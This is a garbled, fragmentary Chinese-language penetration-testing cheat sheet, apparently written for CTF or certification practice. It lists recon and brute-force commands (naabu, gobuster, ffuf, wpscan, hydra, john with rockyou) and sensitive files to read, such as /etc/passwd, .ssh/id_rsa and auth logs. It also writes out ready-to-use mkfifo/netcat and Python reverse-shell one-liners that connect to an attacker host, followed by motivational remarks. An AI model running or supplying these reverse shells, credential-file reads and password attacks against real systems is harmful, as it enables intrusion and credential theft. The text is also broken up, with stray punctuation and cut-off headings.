Recon(Reconnaissance)
, Attack(Exploitation)
, Foothold(Get A New Foothold)
), 不斷的循環直到取得 root, 而 Reconnaissance 是相對花時間的, 這邊列出常用的語法或工具.Initial Access
)naabu -p - -s c -retries 2 -v -stats -nmap-cli 'nmap -sT -A' -host [ip]
gobuster dir -k -x .php,.txt,.html -t 50 -u [web] -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
ffuf -w parameters.txt:PARAM -w val.txt:VAL -u [http://web/index.php?PARAM=VAL] -fs 0
, parameters.txt
於 ffuf 網站下載, val.txt
為一些常見攻擊 payloadwpscan --url [web] --plugins-detection mixed -e vp,vt,tt,cb,dbe,u,m
droopescan scan drupal -u [web]
/etc/passwd
/etc/issue
/proc/version
/proc/self/status
/proc/mounts
.bash_history
.ssh/id_rsa
/var/log/apache2/access.log
/var/log/auth.log
enum4linux -a [ip]
Privilege Escalation
)zip2john file.zip > file.zip.hash
john --wordlist=/usr/share/wordlists/rockyou.txt file.zip.hash
john --wordlist=/usr/share/wordlists/rockyou.txt shadow
hydra -l [user] -P /usr/share/wordlists/rockyou.txt ssh://[ip]
python3 -c 'import pty; pty.spawn("/bin/bash")'
nc -lvnp [port]
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc [ip] [port] >/tmp/f
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[ip]",[port]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
script kiddie
不要覺得很羞恥, 沒有人生下來就會的.Try Harder
.廣度優先
還是 深度優先
?
廣度優先
, 但如果有靈感的話, 可以先走一點 深度優先
.